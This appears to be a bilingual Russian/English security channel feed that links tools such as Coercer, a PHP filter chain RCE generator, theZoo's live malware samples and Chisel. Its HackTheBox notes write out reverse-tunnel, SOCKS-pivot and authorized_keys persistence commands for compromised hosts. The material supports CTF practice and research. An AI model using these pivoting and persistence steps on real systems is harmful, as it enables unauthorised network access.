< #balckhateurope >
< Coercer >
< исследования >
< #github #script #WinServer #audit >

A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.

GitHub: https://github.com/p0dalirius/Coercer

< might be #useful >
< CVE Project >
< может быть полезно >
< #github #db #cve #nvd >

CVE's as JSON

GitHub:
> all in one folder
> вся база в одной папке

https://github.com/olbat/nvdcve


> placed in folders by year
> с разбивкой по годам

https://github.com/CVEProject/cvelist

< #sketch >
< source: (maybe soon I will create a Comic book) >
< character: Archer >

< might be #useful >
< PHP filter chain generator >
< может быть полезно >
< #github #tool #htb #php #php_filters #ctf #reverse #lfi #rce >

Скрипт для генерации PHP filter chain - удобно для получения RCE без подгрузки файлов (в случае если имеется контролируемый параметр)

A CLI to generate PHP filters chain, get your RCE without uploading a file if you control entirely the parameter passed to a require or an include in PHP!

GitHub (CLI tool):
https://github.com/synacktiv/php_filter_chain_generator

HackTricks (Guide):
https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters

How-it-Works:
https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html

#talk #preparation

[ Финально репетирую и отсматриваю презентацию для выступления в эту субботу ]

🚀 Ждите на OSINT mindset meetup №7 с выступлением "Hack back: расследуем криптовалютный скам"

✨ Выше ссылка на канал-календарь выступлений и мероприятий, связанных с OSINT

< might be #useful >
< #talk #presentation >
< может быть полезно >
< #crypto #osint #honeypot #scam >

Материалы выступления <3

Спасибо всем, это мой первый опыт выступления на такую большую аудиторию, надеюсь, вам понравилось! чуть позже выложу запись 🚀

< might be #useful >
< theZoo >
< может быть полезно >
< #github #db #malwareanalysis #reverse #reverseengineering >

Репозиторий с "живыми" вредоносными сэмплами на любой вкус и цвет 👾 создан в рамках инициативы сделать более доступным и открытым для любого желающего материал для анализа ВПО

/столкнулась с тем, что многие не слышали об этом проекте, возможно вам будет полезно (интересно) /

A repository of LIVE malwares for your own joy and pleasure. theZoo is a project created to make the possibility of malware analysis open and available to the public.

GitHub:

https://github.com/ytisf/theZoo

< might be #useful >
< ascii-for-coding >
< может быть полезно >
< #github #ascii #art #style >

Было много вопросов насчёт котиков из презентации, поэтому выкладываю свой репозиторий с ASCII-art комментариями для кода

Если актуально - могу продолжить вести его и постараться выкладывать новые шаблоны 🤔


/*
=========================

^＿^
(｡･ω･｡)つ-☆・*。
⊂ | ・゜+.
し ーＪ °。+ *')
.· ´ .·*') .·')
(¸.·´ (¸.·'* FillMagickSW() Do you believe in Cats? ☆ﾞ

=========================
PROJECT_NAME | DD.MM.YYYY
by crytech7 =========================

*/

There were a lot of questions about the cats from the presentation, so I'm posting my repo that contains a some ASCII_ART comments (C/C++ style) to make even routine tasks a little bit more endearing ∩^ω^∩

If relevant, I can try to create some new templates 🤔

GitHub:

https://github.com/crytech7/ascii-for-coding

< might be #useful >
< Chisel >
< может быть полезно >
< #github #tool #tunnel #endpoint #ctf #htb #c2 >

Быстрый TCP/UDP туннель, представляет собой один исполняемый файл, включающий как клиентский функционал, так и серверный. Очень удобен при решении машин HTB. Написан на Go 👾

> HTB notes: <прослушивание конкретного порта>

1. Чтобы создать реверс туннель, когда Вам требуется подключиться к конкретному порту удаленной машины, достаточно запустить chisel на своей (локальной) машине с опцией --reverse для обратного подключения:

chisel server -p <server listener port> --reverse

2. На удалённую машину любым возможным способом перекидываем бинарник chisel и запускаем его в клиентском режиме:

client <server ip (your ip)>:<server listener port> R:<port we want to connect>:127.0.0.1:<port we want to connect>

> HTB notes: <доступ к локальной сети>

0. ОПЦИОНАЛЬНО (Получив доступ к удаленной машине, добавим свой публичный ключ:
cat your_pub_key >> ~/.ssh/authorized_keys)

1. Чтобы создать реверс туннель, когда Вам требуется получить доступ к эндпойнтам, доступным только через локальную сеть удаленной машины, первым шагом также запускаем chisel на своей (локальной) машине с опцией --reverse для обратного подключения:

chisel server -p <server listener port> --reverse

2. На удалённую машину любым возможным способом перекидываем бинарник  chisel и запускаем его в клиентском режиме:

chisel client <server ip (your ip)>:<server listener port> R:1080:socks

TCP гарантирует доставку пакетов данных через порт 1080 в том же порядке, в котором они были отправлены

3. На Вашей локальной машине (машине атакующего) обновите конфигурационный файл proxychains

/etc/proxychains4.conf

Добавьте в него строку:

socks5 127.0.0.1 1080


Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

Proxychains — это утилита UNIX, которая захватывает связанные с сетью функции libc в динамически подключаемых программах через предварительно загруженную DLL (dlsym(), LD_PRELOAD) и перенаправляет соединения через прокси-серверы SOCKS4a/5 или HTTP (поддерживает только TCP)

GitHub: https://github.com/jpillora/chisel